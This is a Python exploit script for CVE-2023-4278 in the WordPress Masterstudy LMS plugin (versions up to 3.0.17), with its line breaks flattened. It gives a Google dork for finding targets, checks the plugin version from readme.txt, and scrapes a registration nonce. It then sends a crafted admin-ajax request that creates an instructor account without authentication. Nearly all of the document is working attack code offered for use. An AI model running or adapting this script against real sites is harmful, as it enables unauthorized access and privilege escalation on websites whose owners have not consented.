WordPress Masterstudy LMS 3.0.17 Account Creation

# Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation# Google Dork: inurl:/user-public-account# Date: 2023-09-04# Exploit Author: Revan Arifio# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/# Version: <= 3.0.17# Tested on: Windows, Linux# CVE : CVE-2023-4278import requestsimport osimport reimport timebanner = """   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \  | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) | | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ <  | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/                                                                             ======================================================================================================|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       |||| Author           : https://github.com/revan-ar                                                   |||| Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      |||| Support          : https://www.buymeacoffee.com/revan.ar                                         ||======================================================================================================"""print(banner)# get noncedef get_nonce(target):    open_target = requests.get("{}/user-public-account".format(target))    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)    if search_nonce[1] != None:        return search_nonce[1]    else:        print("Failed when getting Nonce :p")# privielege escalationdef privesc(target, nonce, username, password, email):    req_data = {        "user_login":"{}".format(username),        "user_email":"{}".format(email),        "user_password":"{}".format(password),        "user_password_re":"{}".format(password),        "become_instructor":True,        "privacy_policy":True,        "degree":"",        "expertize":"",        "auditory":"",        "additional":[],        "additional_instructors":[],        "profile_default_fields_for_register":[],        "redirect_page":"{}/user-account/".format(target)        }    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)    if start.status_code == 200:        print("[+] Exploit Success !!")    else:        print("[+] Exploit Failed :p")# URL targettarget = input("[+] URL Target: ")print("[+] Starting Exploit")plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))plugin_version = re.search("Stable tag: (.+)", plugin_check.text)int_version = plugin_version[1].replace(".", "")time.sleep(1)if int(int_version) < 3018:    print("[+] Target is Vulnerable !!")    # Credential    email =  input("[+] Email: ")    username =  input("[+] Username: ")    password =  input("[+] Password: ")    time.sleep(1)    print("[+] Getting Nonce...")    get_nonce = get_nonce(target)    # Get Nonce    if get_nonce != None:        print("[+] Success Getting Nonce: {}".format(get_nonce))        time.sleep(1)        # Start PrivEsc        privesc(target, get_nonce, username, password, email)    # ----------------------------------    else:    print("[+] Target is NOT Vulnerable :p")